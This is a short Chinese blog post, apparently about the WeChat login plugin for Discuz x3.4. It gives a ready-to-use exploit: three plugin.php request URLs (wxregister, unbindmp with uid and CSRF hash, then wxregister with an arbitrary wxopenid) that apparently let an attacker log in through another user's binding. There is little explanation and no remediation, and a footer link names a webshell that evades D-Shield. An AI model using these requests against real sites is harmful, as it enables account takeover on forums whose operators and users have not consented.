本文最后更新于：2019 , 八月 19日星期一, 8:56 晚上

影响版本

x3.4，安装并开启了微信登录插件
原贴：https://www.sk15.net/archives/119.html?tdsourcetag=s_pcqq_aiomsg

EXP

# 随机登陆一个账号，任意填写
/plugin.php?id=wechat:wechat&ac=wxregister&username={username}

# 清空tmp
/plugin.php?id=wechat:wechat&ac=unbindmp&uid={uid}&hash={csrf_hash}

# 注册账号
/plugin.php?id=wechat:wechat&ac=wxregister&username={username}&wxopenid=abcdefg

登录之后会跳转到微信，然后回到首页刷新即可

实验

漏洞漏洞

本博客所有文章除特别声明外，均采用 CC BY-SA 3.0协议。转载请注明出处！

PHP一句话过D盾

CVE-2018-15982漏洞复现